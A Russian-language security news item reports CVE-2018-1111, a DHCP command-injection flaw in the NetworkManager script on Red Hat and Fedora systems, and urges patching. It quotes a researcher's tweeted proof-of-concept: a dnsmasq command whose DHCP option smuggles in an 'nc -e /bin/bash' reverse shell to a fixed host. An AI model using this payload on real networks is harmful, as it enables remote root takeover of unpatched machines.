Home | | | Short News | | | Long News | | | Long Reads | | | Support | | | Library |
Брешь позволяет удаленно выполнять команды в системе жертвы, а эксплойт для нее может уместиться в твит.
Исследователи обнаружили критический баг в DHCP-клиенте для операционных систем линейки Red Hat Enterprise Linux Server, а также их производных, таких как Fedora. Ошибка позволяет потенциальному злоумышленнику удаленно выполнять команды с root-привилегиями.
Клиент призван облегчить подключение устройства к сети, автоматически принимая параметры ее конфигурации. Для этого он отправляет DHCP-запрос. Всякий раз, когда от сервера приходит ответ, запускается скрипт интеграции в компоненте NetworkManager. Злоумышленник, имеющий доступ к сети, может подделать этот ответ и заставить скрипт выполнять произвольные команды оболочки.
Уязвимость затрагивает версии 6 и 7 ОС Red Hat Enterprise Linux Server, а также продукты Fedora 26, 27, 28 и Rawhide. При этом производитель отмечает, что проблема не касается систем, подключенных к сети с использованием постоянного IP, и тех, что обходятся без NetworkManager.
Первым брешь заметил ИБ-специалист из Google Феликс Вильгельм (Felix Wilhelm). Он сообщил о баге в Twitter, отметив, что смог написать PoC-код, умещающийся в твит. Он же уведомил разработчика о проблеме, в связи с чем компания Red Hat выразила исследователю благодарность.
CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: https://t.co/jFiOrUH6HG. Exploit fits in a tweet so you should patch as soon as possible.
— Felix Wilhelm (@_fel1x) May 15, 2018
Короткий PoC-код удалось получить и другому ИБ-эксперту, Баркыну Кылычу (Bark?n K?l??) из Турции. В отличие от Вильгельма, исследователь опубликовал свой эксплойт.
#CVE-2018-1111 tweetable PoC ???? dnsmasq –interface=eth0 –bind-interfaces –except-interface=lo –dhcp-range=10.1.1.1,10.1.1.10,1h –conf-file=/dev/null –dhcp-option=6,10.1.1.1 –dhcp-option=3,10.1.1.1 –dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat pic.twitter.com/vUICm2HluC
— Bark?n K?l?? (@Barknkilic) May 15, 2018
Производитель уже выпустил патчи для всех упомянутых систем и настоятельно советует клиентам установить их как можно скорее. При этом упоминается, что существует возможность отключить уязвимое приложение, однако это может привести к ошибкам при конфигурации сети. Ссылки на обновления содержатся в рекомендациях по безопасности на сайтах Red Hat и Fedora.
Ранее в этом году ИБ-специалисты уже исправляли уязвимости, связанные со сфабрикованными DHCP-запросами. Бреши позволяли вызывать отказ клиента, удаленно выполнять код и выводить сервер из строя.
19:45 |
||
17:45 |
||
14:45 |
||
12:45 |
||
11:45 |
||
09:45 |
||
09:45 |
||
19:45 |
||
18:45 |
||
16:45 |
||
15:45 |
||
14:45 |
||
13:45 |
||
10:45 |
||
10:45 |
||
09:45 |
||
19:45 |
||
19:45 |
Home | | | Short News | | | Long News | | | Long Reads | | | Support | | | Library | | | Blogs | | | Links |